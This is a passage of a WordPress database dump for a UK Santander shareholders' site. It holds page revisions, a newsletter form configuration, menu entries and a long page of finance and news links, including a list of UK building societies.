href=\"https://news.google.com/news?ncl=d6k4kXGmPtFITTMQLDRz3S_EwP2QM&q=santander+share+price&lr=English&hl=en&sa=X&ved=0ahUKEwiqnJv-we_WAhXEuBoKHZdZBj0QqgIIKzAC\">View all</a></div>\r\n</div>\r\n<div class=\"_cJs\"></div>\r\n</div>\r\n</div>\r\n<div class=\"g\">\r\n<div class=\"ts _JGs _JHs _tJs _KGs _jHs\">\r\n<div class=\"_hJs\">\r\n<h3 class=\"r _gJs\"><a class=\"l _PMs\" href=\"http://www.stocksgallery.com/2017/10/13/banco-santander-s-a-san-has-a-value-of-6-64-per-share-while-bank-of-the-ozarks-ozrk-is-stand-at-45-70/\">Banco <em>Santander</em>, SA (SAN) has a value of $6.64 per <em>share</em> While ...</a></h3>\r\n<div class=\"slp\"><span class=\"_OHs _PHs\">Stocks Gallery</span><span class=\"_QGs\">-</span><span class=\"f nsa _QHs\">16 hours ago</span></div>\r\n<div class=\"st\">In recent trading day Banco <em>Santander</em>, S.A. (SAN) <em>stock</em> showed the move of -0.90% with the closing <em>price</em> of $6.64. Closing <em>price</em> generally ...</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"g\">\r\n<div class=\"ts _JGs _JHs _tJs _KGs _jHs\">\r\n<div class=\"_hJs\">\r\n<h3 class=\"r _gJs\"><a class=\"l _PMs\" href=\"https://stocknewsgazette.com/2017/10/12/banco-santander-s-a-nysesan-gives-mixed-technical-signals-today/\">Banco <em>Santander</em>, SA (NYSE:SAN) Gives Mixed Technical Signals ...</a></h3>\r\n<div class=\"slp\"><span class=\"_OHs _PHs\">StockNewsGazette</span><span class=\"_QGs\">-</span><span class=\"f nsa _QHs\">12 Oct 2017</span></div>\r\n<div class=\"st\">Banco <em>Santander</em>, S.A. (NYSE:SAN) fell by -1.76% in Wednesday\'s trading session from $6.82 to $6.70 The <em>stock price</em> went upward in 6 of the ...</div>\r\n</div>\r\n</div>\r\n</div>','In the News','','inherit','closed','closed','','8-revision-v1','','','2017-10-14 06:46:57','2017-10-14 06:46:57','',8,'http://santandershareholder.co.uk/8-revision-v1',0,'revision','',0),(102,1,'2017-10-14 07:10:38','2017-10-14 07:10:38','The purpose of this website is to give UK Santander Share holders a forum to voice any satisfaction or dissatification with Santander. The site is NOT associated with Santander or any Santander holding company. If you would like to get in touch with this site\'s webmaster then <a href=\"http://santandershareholder.co.uk/contact-us\">click here.</a>\r\n\r\nWe believe that Santander has not always worked in the best interested of it share holders. We believe that we are not alone in believing this. We would like to hear from other share holders who hold the same options and could elaborate on how best we put pressure on Santander to listen to our objections.\r\n\r\nBelow are some links you might find interesting\r\n<ul>\r\n <li><a href=\"http://www.santander.co.uk/uk/about-santander-uk/investor-relations/events-calendar\" target=\"_blank\" rel=\"noopener\">Here is the calendar for the next results announcements.</a></li>\r\n <li class=\"tituloflex\"><a href=\"https://www.santander.com/csgs/Satellite/CFWCSancomQP01/en_GB/Corporate/Press-room/Santander-News/2017/10/10/Santander-increases-profitability-target-for-2018-.html\" target=\"_self\">Santander increases profitability target for 2018 </a></li>\r\n</ul>\r\nDividends\r\n\r\nIf you feel that the progress and value of Santander share dividend payments have not been the amount that you had hoped for then please <a href=\"http://santandershareholder.co.uk/financial-information\">click here.</a>\r\n\r\n[wpforms id=\"86\"]','shareholder-services','','inherit','closed','closed','','17-revision-v1','','','2017-10-14 07:10:38','2017-10-14 07:10:38','',17,'http://santandershareholder.co.uk/17-revision-v1',0,'revision','',0),(107,1,'2017-10-14 07:17:49','2017-10-14 07:17:49','','cropped-23-08-46-769_640x420-1.jpg','','inherit','open','closed','','cropped-23-08-46-769_640x420-1-jpg','','','2017-10-14 07:17:49','2017-10-14 07:17:49','',0,'http://santandershareholder.co.uk/wp-content/uploads/2017/10/cropped-23-08-46-769_640x420-1.jpg',0,'attachment','image/jpeg',0),(109,1,'2017-10-14 07:20:09','2017-10-14 07:20:09','The purpose of this website is to give UK Santander Share holders a forum to voice any satisfaction or dissatification with Santander. The site is NOT associated with Santander or any Santander holding company. If you would like to get in touch with this site\'s webmaster then <a href=\"http://santandershareholder.co.uk/contact-us\">click here.</a>\r\n\r\nWe believe that Santander has not always worked in the best interested of it share holders. We believe that we are not alone in believing this. We would like to hear from other share holders who hold the same options and could elaborate on how best we put pressure on Santander to listen to our objections.\r\n\r\nBelow are some links you might find interesting\r\n<ul>\r\n <li><a href=\"http://www.santander.co.uk/uk/about-santander-uk/investor-relations/events-calendar\" target=\"_blank\" rel=\"noopener\">Here is the calendar for the next results announcements.</a></li>\r\n <li class=\"tituloflex\"><a href=\"https://www.santander.com/csgs/Satellite/CFWCSancomQP01/en_GB/Corporate/Press-room/Santander-News/2017/10/10/Santander-increases-profitability-target-for-2018-.html\" target=\"_self\">Santander increases profitability target for 2018 </a></li>\r\n</ul>\r\nDividends\r\n\r\nIf you feel that the progress and value of Santander share dividend payments have not been the amount that you had hoped for then please <a href=\"http://santandershareholder.co.uk/financial-information\">click here.</a>\r\n\r\n','shareholder-services','','inherit','closed','closed','','17-revision-v1','','','2017-10-14 07:20:09','2017-10-14 07:20:09','',17,'http://santandershareholder.co.uk/17-revision-v1',0,'revision','',0),(111,1,'2017-10-14 07:24:26','2017-10-14 07:24:26','{\"id\":\"111\",\"field_id\":2,\"fields\":{\"1\":{\"id\":\"1\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"}},\"settings\":{\"form_title\":\"Newsletter Signup Form\",\"form_desc\":\"\",\"form_class\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"submit_class\":\"\",\"honeypot\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"carboncopy\":\"\",\"subject\":\"New Newsletter Signup Form Entry\",\"sender_name\":\"Santander Share Holders\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\",\"message\":\"{all_fields}\",\"notification_name\":\"\"}},\"confirmation_type\":\"message\",\"confirmation_message\":\"Thanks for contacting us! We will be in touch with you shortly.\",\"confirmation_message_scroll\":\"1\",\"confirmation_page\":\"25\",\"confirmation_redirect\":\"\"},\"meta\":{\"template\":\"subscribe\"}}','Newsletter Signup Form','','publish','closed','closed','','newsletter-signup-form','','','2017-10-14 07:24:41','2017-10-14 07:24:41','',0,'http://santandershareholder.co.uk/?post_type=wpforms&p=111',0,'wpforms','',0),(112,1,'2017-10-14 07:25:59','2017-10-14 07:25:59','','Home','','publish','closed','closed','','112','','','2017-10-14 07:26:58','2017-10-14 07:26:58','',0,'http://santandershareholder.co.uk/?p=112',1,'nav_menu_item','',0),(113,1,'2017-10-14 07:26:00','2017-10-14 07:26:00','','Calendar','','publish','closed','closed','','113','','','2017-10-14 07:26:58','2017-10-14 07:26:58','',0,'http://santandershareholder.co.uk/?p=113',5,'nav_menu_item','',0),(114,1,'2017-10-14 07:26:00','2017-10-14 07:26:00',' ','','','publish','closed','closed','','114','','','2017-10-14 07:26:58','2017-10-14 07:26:58','',0,'http://santandershareholder.co.uk/?p=114',7,'nav_menu_item','',0),(115,1,'2017-10-14 07:26:00','2017-10-14 07:26:00',' ','','','publish','closed','closed','','115','','','2017-10-14 07:26:58','2017-10-14 07:26:58','',0,'http://santandershareholder.co.uk/?p=115',2,'nav_menu_item','',0),(116,1,'2017-10-14 07:26:00','2017-10-14 07:26:00',' ','','','publish','closed','closed','','116','','','2017-10-14 07:26:58','2017-10-14 07:26:58','',10,'http://santandershareholder.co.uk/?p=116',3,'nav_menu_item','',0),(117,1,'2017-10-14 07:26:00','2017-10-14 07:26:00',' ','','','publish','closed','closed','','117','','','2017-10-14 07:26:58','2017-10-14 07:26:58','',13,'http://santandershareholder.co.uk/?p=117',4,'nav_menu_item','',0),(118,1,'2017-10-14 07:26:00','2017-10-14 07:26:00',' ','','','publish','closed','closed','','118','','','2017-10-14 07:26:58','2017-10-14 07:26:58','',0,'http://santandershareholder.co.uk/?p=118',6,'nav_menu_item','',0),(122,1,'2017-10-14 07:27:36','2017-10-14 07:27:36',' ','','','publish','closed','closed','','122','','','2017-10-14 07:27:36','2017-10-14 07:27:36','',0,'http://santandershareholder.co.uk/?p=122',3,'nav_menu_item','',0),(123,1,'2017-10-14 07:27:36','2017-10-14 07:27:36',' ','','','publish','closed','closed','','123','','','2017-10-14 07:27:36','2017-10-14 07:27:36','',0,'http://santandershareholder.co.uk/?p=123',1,'nav_menu_item','',0),(124,1,'2017-10-14 07:27:36','2017-10-14 07:27:36',' ','','','publish','closed','closed','','124','','','2017-10-14 07:27:36','2017-10-14 07:27:36','',0,'http://santandershareholder.co.uk/?p=124',2,'nav_menu_item','',0),(125,1,'2017-10-14 07:45:49','2017-10-14 07:45:49','<h2>Financial Institutions, publications and websites of note</h2>\r\n \r\n<ul>\r\n <li><a href=\"http://fortune.com/\" target=\"_blank\" >Fortune Magazine</a>: A magazine focused on Fortune 500 companies and breaking business news.</li>\r\n <li><a href=\"http://hbr.org/\" target=\"_blank\" >Harvard Business Review</a></li>\r\n <li><a href=\"http://www.huffingtonpost.com/\" target=\"_blank\" >Huffington Post</a> UK and US finance news</li>\r\n <li><a href=\"http://www.gfma.org/\" target=\"_blank\" >Global Financial Markets Association</a>: An association representing the world\'s leading financial and capital market participants.</li>\r\n <li><a href=\"http://www.icba.org/\" target=\"_blank\" >The Independent Community Bankers of America</a>: A resource site for independent bankers.</li>\r\n <li><a href=\"http://www.naifa.org/\" target=\"_blank\" >National Association of Insurance and Financial Advisors</a>: An association representing the interests of insurance and financial advisors in the US</li>\r\n <li><a href=\"http://www.sifma.org/about/\" target=\"_blank\" >Securities Industry and Financial Markets Association</a>: An association that brings together the shared interests security firms, banks and asset managers.</li>\r\n <li><a href=\"http://www.kiplinger.com/\" target=\"_blank\" >Kiplinger</a>: US magazine offering personal financial news, investing admire and business forecasts.</li>\r\n <li><a href=\"http://www.nytimes.com/pages/business/\" target=\"_blank\" >The New York Times</a>: Breaking headlines + financial news from Wall Street.</li>\r\n <li><a href=\"http://time.com/\" target=\"_blank\" >Time</a>: More in-depth political, economic and news worthy stories.</li>\r\n <li><a href=\"http://online.wsj.com/home-page\" target=\"_blank\" >Wall Street Journal</a>: Newspaper focusing on domestic and international news with a business-focus.</li>\r\n <li><a href=\"https://www.hunterfinance.co.uk/apply-for-loan\" target=\"blank"\">Hunter Finance</a> UK finance house offering property loans</li>\r\n <li><a href=\"https://www.fca.org.uk/\" target=\"_blank\" >FCA | </a>Financial Conduct Authority</li>\r\n <li><a href=\"http://www.bankofengland.co.uk/Pages/home.aspx\" target=\"_blank\" >Bank of England</a></li>\r\n</ul>\r\n \r\n\r\n<strong>Other Finance websites</strong>\r\n<ul>\r\n <li><a href=\"http://www.waterfall-leasing.co.uk/\" target=\"blank"\">Waterfall leasing</a></li>\r\n <li><a href=\"http://www.mytermlifeinsurance.co.uk/\" target=\"blank"\">My term lifeinsurance</a></li>\r\n <li><a href=\"http://www.kings-college-brokers.co.uk/\" target=\"blank"\">Kings college brokers</a></li>\r\n <li><a href=\"http://www.firstchoiceloan.co.uk/\" target=\"blank"\">First choice UK loans</a></li>\r\n <li><a href=\"http://www.legal-medical.co.uk/\" target=\"blank"\">legal medical</a></li>\r\n <li><a href=\"http://www.rapc.co.uk/\" target=\"blank"\">rapc</a></li>\r\n <li><a href=\"http://www.humdrumming.co.uk/\" target=\"blank"\">Hum drumming</a></li>\r\n <li><a href=\"http://www.endowment-policy.co.uk/\" target=\"blank"\">Leading LLD Endowment policy</a></li>\r\n <li><a href=\"http://www.simply-accounting.co.uk/\" target=\"blank"\">TEC Simply accounting</a></li>\r\n <li><a href=\"http://www.fisa.co.uk/\" target=\"blank"\">FISA </a></li>\r\n <li><a href=\"http://www.slconsultancy.co.uk/\" target=\"blank"\">SLC (UK) Consultancy </a></li>\r\n <li><a href=\"http://www.wokingham-cab.org.uk/\" target=\"blank"\">Wokingham cab</a></li>\r\n <li><a href=\"http://www.delanceyandco.co.uk/\" target=\"blank"\">Delancey & co</a></li>\r\n</ul>\r\n<strong>List of All UK Building Societies</strong>\r\n\r\nBath Investment & Building Society\r\nBeverley Building Society\r\nBuckinghamshire Building Society\r\n\r\nCambridge Building Society\r\nChorley and District Building Society, The\r\nCoventry Building Society\r\nCumberland Building Society\r\n\r\nDarlington Building Society\r\nDudley Building Society\r\nDunfermline Building Society (In Administration)\r\n\r\nEarl Shilton Building Society\r\nEcology Building Society\r\n\r\nFurness Building Society\r\n\r\nHanley Economic Building Society\r\nHarpenden Building Society\r\nHinckley and Rugby Building Society\r\nHolmesdale Building Society\r\n\r\nIpswich Building Society\r\n\r\nLeeds Building Society\r\nLeek United Building Society\r\nLoughborough Building Society\r\nManchester Building Society\r\nMansfield Building Society, The\r\nMarket Harborough Building Society\r\nMarsden Building Society\r\nMelton Mowbray Building Society\r\nMonmouthshire Building Society\r\n\r\nNational Counties Building Society\r\nNationwide Building Society\r\nNewbury Building Society\r\nNewcastle Building Society\r\nNottingham Building Society\r\n\r\nPenrith Building Society\r\nPrincipality Building Society\r\nProgressive Building Society\r\n\r\nSaffron Building Society\r\nScottish Building Society\r\nSkipton Building Society\r\nStafford Railway Building Society, The\r\nSwansea Building Society\r\n\r\nTeachers\' Building Society\r\nTipton and Coseley Building Society\r\n\r\nVernon Building Society\r\n\r\nWest Bromwich Building Society\r\n\r\nYorkshire Building Society\r\n\r\nOther Financial links of interest\r\n\r\n \r\n\r\n<a href=\"http://www.accountingweb.com/\" target=\"_blank\" >Accounting Web</a>: A site that provides accounting news, information, tips, tools and resources for financial professionals.\r\n\r\n<a href=\"http://www.annualreports.com/\" target=\"_blank\" >Annual Reports</a>: This site allows users to view financial reports from companies.\r\n\r\n<a href=\"http://www.banktech.com/\" target=\"_blank\" >Bank Systems and Technology</a>: A sitefor the banking informational technology community.\r\n\r\n<a href=\"http://www.bankersalmanac.com/addcon/home/resources.aspx\" target=\"_blank\" >Bankers Almanac</a>: This site provides links to websites of international banks and other financial institutions.\r\n\r\n<a href=\"http://www.bankersonline.com/\" target=\"_blank\" >Bankers Online</a>: A site for bankers and financial experts providing information on marketing, technology and e-banking.\r\n\r\n<a href=\"http://www.bizjournals.com/bizwomen\" target=\"_blank\" >BizWomen</a>: A site for women business professionals.\r\n\r\n<a href=\"http://www.charteredbanker.com/\" target=\"_blank\" >Chartered Banker Institute</a>: Find useful information and insights and resources into finance and banking.\r\n\r\n<a href=\"http://www.dailyfinance.com/\" target=\"_blank\" >Daily Finance</a>: A site offering articles and information from leading business and financial experts.\r\n\r\n<a href=\"http://www.dividendinvestor.com/\" target=\"_blank\" >Dividend Investor</a>: A site specializing in stock data analysis and provisions.\r\n\r\n<a href=\"http://equityfeed.com/\" target=\"_blank\" >Equity Feed</a>: A site specifically targeting active traders and day traders.\r\n\r\n<a href=\"http://www.frbsf.org/\" target=\"_blank\" >Federal Reserve Bank of San Francisco</a>: The site for the Federal Reserve Bank of San Francisco.\r\n\r\n \r\n\r\n<a href=\"http://www.franchising.com/\" target=\"_blank\" >Franchise Update Media</a>: A site connecting franchise industry decision makers with information and resources.\r\n\r\n<a href=\"http://www.ibankingfaq.com/\" target=\"_blank\" >IBanking FAQ</a>: A sitewith investment banking resources and information.\r\n\r\n<a href=\"http://independentbanker.org/\" target=\"_blank\" >Independent Banker</a>: A site for community banking news, trends and insights.\r\n\r\n<a href=\"http://www.informationweek.com/\" target=\"_blank\" >Information Week</a>: A site for the business technology professionals.\r\n\r\n<a href=\"http://ino.com/\" target=\"_blank\" >INO.com</a>: A site specializing in the futures and options markets, with continuous quotes, charts and news.\r\n\r\n<a href=\"http://www.ici.org/\" target=\"_blank\" >Investment Company Institute</a>: The sitefor the company working to advance the interests of mutual funds, their shareholders, directors and investment advisers.\r\n\r\n<a href=\"http://www.investopedia.com/\" target=\"_blank\" >
Investopedia</a>: A site for beginners in the banking and financial industry that includes a stock simulator.\r\n\r\n<a href=\"http://www.investors.com/default.htm\" target=\"_blank\" >Investor\'s Business Daily</a>: A site for stock investment research and education, in addition to business and financial news.\r\n\r\n<a href=\"https://www.jpmorgan.com/pages/jpmorgan\" target=\"_blank\" >JP Morgan</a>: The site for the JP Morgan financial company.\r\n\r\n<a href=\"http://www.kauffman.org/what-we-do/research\" target=\"_blank\" >The Kauffman Foundation</a>: A research site helping businesses understand what drives innovation and economic growth.\r\n\r\n<a href=\"http://www.londonstockexchange.com/home/homepage.htm\" target=\"_blank\" >London Stock Exchange</a>: The official sitewith stock prices and international markets for the London Stock Exchange.\r\n\r\n<a href=\"http://www.fool.com/?source=iflsittph0000001\" target=\"_blank\" >The Motley Fool</a>: A site with current stock prices and investing advice.\r\n\r\n<a href=\"http://www.nasdaq.com/\" target=\"_blank\" >Nasdaq</a>: The site for Nasdaq, which gives continuous updates throughout the day.\r\n\r\n<a href=\"https://www.nyse.com/index\" target=\"_blank\" >New York Stock Exchange</a>: The site for the NYSE with information for investors and other financial professionals.\r\n\r\n<a href=\"https://www.probanx.com/\" target=\"_blank\" >Probanx</a>: A site for eBanking software.\r\n\r\n<a href=\"http://www.sec.gov/\" target=\"_blank\" >Securities and Exchange Commission</a>: As part of the Federal Government, the SEC protects investors and maintains market integrity among many other jobs in the finance industry.\r\n\r\n<a class=\"broken_link\" href=\"http://www.seisfund.com/home.html\" target=\"_blank\" >SEIS Fund</a>: A start-up funding sitefor businesses.\r\n\r\n<a href=\"https://www.scottrade.com/online-trading/trading-website.html\" target=\"_blank\" >Scottrade</a>: The sitefor the Scottrade financial company.\r\n\r\n<a href=\"http://www.shibuimarkets.com/\" target=\"_blank\" >Shibui Markets</a>: A global financial portal that helps users understand financial information including foreign currency exchanges, emerging market bonds and international equities.\r\n\r\n<a href=\"http://www.standardandpoors.com/en_US/web/guest/home\" target=\"_blank\" >Standard and Poor\'s</a>: The site for the world\'s leading contributor of independent credit ratings, risk evaluation and investment research.\r\n\r\n<a href=\"http://www.startupnation.com/\" target=\"_blank\" >Startup Nation</a>: A site to help businesses grow and plan for their future.\r\n\r\n<a href=\"http://www.thestreet.com/\" target=\"_blank\" >The Street</a>: A site giving financial news and information along with the stock market updates.\r\n\r\n<a href=\"http://stockcharts.com/\" target=\"_blank\" >Stock Charts</a>: A site offering tools to create attractive financial charts.\r\n\r\n<a href=\"http://www.stockmarketgame.org/\" target=\"_blank\" >The Stock Market Game</a>: A site with real time stock information and news on the stock markets.\r\n\r\n<a href=\"http://www.stocktrak.com/\" target=\"_blank\" >Stock Trak</a>: A site for stock market game simulations.\r\n\r\n<a href=\"https://www.tdameritrade.com/home.page\" target=\"_blank\" >TD Ameritrade</a>: The sitefor the financial trading company.\r\n\r\n<a href=\"http://www.ted.com/\" target=\"_blank\" >TED</a>: A multitude of videos from the country\'s most sought after business innovators and financial experts.\r\n\r\n<a href=\"http://www.updown.com/\" target=\"_blank\" >UpDown</a>: A real-time trading simulation to help investors of all levels to improve their skills.\r\n\r\n<a href=\"https://personal.vanguard.com/us/funds/snapshot?FundId=0970&FundIntExt=INT\" target=\"_blank\" >Vanguard</a>: The sitefor the financial planning company.\r\n<h3>Business Associations and Organizations</h3>\r\n<a href=\"http://www.aba.com/Pages/default.aspx\" target=\"_blank\" >American Bankers Association</a>: Financial and regulatory information for bankers and financial professionals and consumers.\r\n\r\n<a href=\"http://www.afajof.org/view/index.html\" target=\"_blank\" >American Financial Association</a>: An organization devoted to the study and promotion and knowledge of financial economics.\r\n\r\n<a href=\"http://www.imanet.org/ima_home.aspx\" target=\"_blank\" >Association of Accountants and Financial Professionals in Business</a>: An organization to promote knowledge and professionalism among cost accountants and financial executives.\r\n\r\n<a href=\"http://www.afponline.org/\" target=\"_blank\" >Association for Financial Professionals</a>: A professional society that represents finance executives globally.\r\n\r\n<a href=\"http://www.bis.org/about/index.htm\" target=\"_blank\" >Bank for International Settlements</a>: The world\'s oldest international financial organization.\r\n\r\n<a href=\"https://www.cfa.com/eweb/\" target=\"_blank\" >Commercial Finance Associations</a>: The international trade association dedicated to the asset-based lending and factoring industries.\r\n\r\n<a href=\"http://www.efa-online.org/r/default.asp?iId=ILGLJ\" target=\"_blank\" >European Finance Association</a>: A professional society of academics and practitioners with an interest in financial management, theory and application.\r\n\r\n<a href=\"http://www.financialexecutives.org/KenticoCMS/home.aspx#axzz3HgZcmiN7\" target=\"_blank\" >Financial Executives International</a>: A site senior-level financial executives.\r\n\r\n<a href=\"http://fwa.org/\" target=\"_blank\" >Financial Women\'s Association</a>: An association for high-achieving financial professionals.\r\n\r\n \r\n\r\n<a href=\"http://www.financialpro.org/\" target=\"_blank\" >Society of Financial Service Professionals</a>: Society of financial professionals helping consumers with financial planning.\r\n<h3>News Agencies and Financial News</h3>\r\n<a href=\"http://www.americanbanker.com/\" target=\"_blank\" >American Banker</a>: A sitedevoted to news from the US banking and finance industries.\r\n\r\n<a href=\"http://www.bloomberg.com/\" target=\"_blank\" >Bloomberg News</a>: 24-hour news coverage on economies, markets, commerce, industries and governments.\r\n\r\n<a href=\"http://www.cnbc.com/\" target=\"_blank\" >CNBC</a>: The business centered portion of NBC with 24-hour business news.\r\n\r\n<a href=\"http://www.cnn.com/\" target=\"_blank\" >CNN</a>: The 24-hour news channel\'s sitethat is constantly updated with breaking stories from around the world, including both financial, political and economic news.\r\n\r\n<a href=\"http://money.cnn.com/\" target=\"_blank\" >CNN Money</a>: This site is devoted to financial and economic news from around the world.\r\n\r\n<a href=\"http://dealbreaker.com/\" target=\"_blank\" >Dealbreaker</a>: A sitewith financial news, commentary and analysis about Wall Street.\r\n\r\n<a href=\"http://www.efinancialnews.com/\" target=\"_blank\" >eFinancial News</a>: A securities and investment banking weekly news source.\r\n\r\n<a href=\"http://www.ft.com/home/us\" target=\"_blank\" >Financial Times</a>: This site, based in the UK, provides international business, finance, economic and political news and commentary.\r\n\r\n<a href=\"http://www.foxbusiness.com/index.html\" target=\"_blank\" >Fox Business News</a>: Website for the 24-news channel, focused on business news.\r\n\r\n<a href=\"https://www.google.com/finance\" target=\"_blank\" >Google Finance</a>: This site provides real-time stock quotes and charts, financial news, currency conversion and portfolio tracking.\r\n\r\n<a href=\"http://www.ibtimes.com/\" target=\"_blank\" >International Business Times</a>: This site provides international business news, financial news, market news and political commentary that many CEOs need to keep up to date on the ever-changing world around them.\r\n\r\n<a href=\"http://www.marketplace.org/\" target=\"_blank\" >Marketplace</a>: A site from American Public Media centered on the economy, personal finance, Wall Street and World News.\r\n\r\n<a href=\"http://www.marketwatch.com/\" target=\"_blank\" >Market Watch</a>: The financial siteis a subsidiary of the Wall Street Journal. This site has up-to-date financial information and stock market numbers.\r\n\r\n<a href=\"http://www.msn.com/en-us/money\" target=\"_blank\" >MSN Money</a>: The financial siteof NBC News. This site provides information on personal finance and the stock markets.\r\n\r\n<a href=\"http://www.npr.org/\" target=\"_blank\" >NPR</a>: Local, domestic and international news presented in various news programs and blogs.\r\n\r\n<a href=\"http://dealbook.nytimes.com/\" target=\"_blank\" >NYT Dealbook</a>: A blog with business news and opinion columns on Wall Street.\r\n\r\n<a href=\"http://qz.com/\" target=\"_blank\" >Quartz</a>: A relatively new news agency, focused on the global economy. News is designed to be read on tablets and smart phones.\r\n\r\n<a href=\"http://www.reuters.com/finance\" target=\"_blank\" >Reuters Finance</a>: The top news organization\'s site for financial news.\r\n\r\n<a href=\"http://finance.yahoo.com/\" target=\"_blank\" >Yahoo Finance</a>: This site has up to date financial news, in addition to portfolio managements resources, international market date, message boards and more.\r\n\r\n ','Finance Links','','publish','closed','closed','','finance-links','','','2017-10-14 07:57:04','2017-10-14 07:57:04','',0,'http://santandershareholder.co.uk/?page_id=125',0,'page','',0),(126,1,'2017-10-14 07:32:10','2017-10-14 07:32:10','','Finance Links','','inherit','closed','closed','','125-revision-v1','','','2017-10-14 07:32:10','2017-10-14 07:32:10','',125,'http://santandershareholder.co.uk/125-revision-v1',0,'revision','',0),(127,1,'2017-10-14 07:45:49','2017-10-14 07:45:49',' ','','','publish','closed','closed','','127','','','2017-10-14 07:45:49','2017-10-14 07:45:49','',0,'http://santandershareholder.co.uk/127',8,'nav_menu_item','',0),(128,1,'2017-10-14 07:45:49','2017-10-14 07:45:49','<ul>\r\n <li><a href=\"http://fortune.com/\" target=\"_blank\" rel=\"noopener\">Fortune Magazine</a>: A magazine focused on Fortune 500 companies and breaking business news.\r\n\r\n </li>\r\n <li><a href=\"http://hbr.org/\" target=\"_blank\" rel=\"noopener\">Harvard Business Review</a></li>\r\n <li><a href=\"http://www.huffingtonpost.com/\" target=\"_blank\" rel=\"noopener\">Huffington Post</a> UK and US finance news\r\n\r\n<a href=\"http://www.kiplinger.com/\" target=\"_blank\" rel=\"noopener\">Kiplinger</a>: The site to the popular magazine offering personal financial news, investing admire and business forecasts.</li>\r\n <li><a href=\"http://www.nytimes.com/pages/business/\" target=\"_blank\" rel=\"noopener\">The New York Times</a>: The website for the popular newspaper with breaking headlines and financial news from Wall Street.</li>\r\n <li><a href=\"http://time.com/\" target=\"_blank\" rel=\"noopener\">Time</a>: A magazine with in-depth political, economic and news worthy stories.</li>\r\n <li><a href=\"http://www.usatoday.com/\" target=\"_blank\" rel=\"noopener\">USA Today</a>: A newspaper highlighting the top stories around the country and world.</li>\r\n <li><a href=\"http://online.wsj.com/home-page\" target=\"_blank\" rel=\"noopener\">Wall Street Journal</a>: Newspaper focusing on domestic and international news with a business-focus.</li>\r\n <li><a href=\"https://www.hunterfinance.co.uk/apply-for-loan\" target=\"blank"\">Huner Finance</a> UK finance house offering property loans</li>\r\n</ul>\r\n<strong>Other Finance websites</strong>\r\n<ul>\r\n <li><a href=\"http://waterfall-leasing.co.uk/\" target=\"blank"\">Waterfall leasing</a></li>\r\n <li><a href=\"http://mytermlifeinsurance.co.uk/\" target=\"blank"\">My term lifeinsurance</a></li>\r\n <li><a href=\"http://kings-college-brokers.co.uk/\" target=\"blank"\">Kings college brokers</a></li>\r\n <li><a href=\"http://firstchoiceloan.co.uk/\" target=\"blank"\">First choice UK loans</a></li>\r\n <li><a href=\"http://legal-medical.co.uk/\" target=\"blank"\">legal medical</a></li>\r\n <li><a href=\"http://rapc.co.uk/\" target=\"blank"\">rapc</a></li>\r\n <li><a href=\"http://humdrumming.co.uk/\" target=\"blank"\">Hum drumming</a></li>\r\n <li><a href=\"http://endowment-policy.co.uk/\" target=\"blank"\">Leading LLD Endowment policy</a></li>\r\n <li><a href=\"http://simply-accounting.co.uk/\" target=\"blank"\">TEC Simply accounting</a></li>\r\n <li><a href=\"http://fisa.co.uk/\" target=\"blank"\">FISA </a></li>\r\n <li><a href=\"http://slconsultancy.co.uk/\" target=\"blank"\">SLC (UK) Consultancy </a></li>\r\n <li><a href=\"http://wokingham-cab.org.uk/\" target=\"blank"\">Wokingham cab</a></li>\r\n <li><a href=\"http://delanceyandco.co.uk/\" target=\"blank"\">Delancey & co</a></li>\r\n</ul>\r\n<strong>List of All UK Building Societies</strong>\r\n\r\nBath Investment & Building Society\r\nBeverley Building Society\r\nBuckinghamshire Building Society\r\n\r\nCambridge Building Society\r\nChorley and District Building Society, The\r\nCoventry Building Society\r\nCumberland Building Society\r\n\r\nDarlington Building Society\r\nDudley Building Society\r\nDunfermline Building Society (In Administration)\r\n\r\nEarl Shilton Building Society\r\nEcology Building Society\r\n\r\nFurness Building Society\r\n\r\nHanley Economic Building Society\r\nHarpenden Building Society\r\nHinckley and Rugby Building Society\r\nHolmesdale Building Society\r\n\r\nIpswich Building Society\r\n\r\nLeeds Building Society\r\nLeek United Building Society\r\nLoughborough Building Society\r\nManchester Building Society\r\nMansfield Building Society, The\r\nMarket Harborough Building Society\r\nMarsden Building Society\r\nMelton Mowbray Building Society\r\nMonmouthshire Building Society\r\n\r\nNational Counties Building Society\r\nNationwide Building Society\r\nNewbury Building Society\r\nNewcastle Building Society\r\nNottingham Building Society\r\n\r\nPenrith Building Society\r\nPrincipality Building Society\r\nProgressive Building Society\r\n\r\nSaffron Building Society\r\nScottish Building Society\r\nSkipton Building Society\r\nStafford Railway Building Society, The\r\nSwansea Building Society\r\n\r\nTeachers\' Building Society\r\nTipton and Coseley Building Society\r\n\r\nVernon Building Society\r\n\r\nWest Bromwich Building Society\r\n\r\nYorkshire Building Society\r\n\r\nOther Financial links of interest\r\n\r\n \r\n\r\n<a href=\"http://www.accountingweb.com/\" target=\"_blank\" rel=\"noopener\">Accounting Web</a>: A site that provides accounting news, information, tips, tools and resources for financial professionals.\r\n\r\n<a href=\"http://www.annualreports.com/\" target=\"_blank\" rel=\"noopener\">Annual Reports</a>: This site allows users to view financial reports from companies.\r\n\r\n<a href=\"http://www.banktech.com/\" target=\"_blank\" rel=\"noopener\">Bank Systems and Technology</a>: A website for the banking informational technology community.\r\n\r\n<a href=\"http://www.bankersalmanac.com/addcon/home/resources.aspx\" target=\"_blank\" rel=\"noopener\">Bankers Almanac</a>: This site provides links to websites of international banks and other financial institutions.\r\n\r\n<a href=\"http://www.bankersonline.com/\" target=\"_blank\" rel=\"noopener\">Bankers Online</a>: A site for bankers and financial experts providing information on marketing, technology and e-banking.\r\n\r\n<a href=\"http://www.bizjournals.com/bizwomen\" target=\"_blank\" rel=\"noopener\">BizWomen</a>: A site for women business professionals.\r\n\r\n<a href=\"http://www.charteredbanker.com/\" target=\"_blank\" rel=\"noopener\">Chartered Banker Institute</a>: Find useful information and insights and resources into finance and banking.\r\n\r\n<a href=\"http://www.dailyfinance.com/\" target=\"_blank\" rel=\"noopener\">Daily Finance</a>: A site offering articles and information from leading business and financial experts.\r\n\r\n<a href=\"http://www.dividendinvestor.com/\" target=\"_blank\" rel=\"noopener\">Dividend Investor</a>: A site 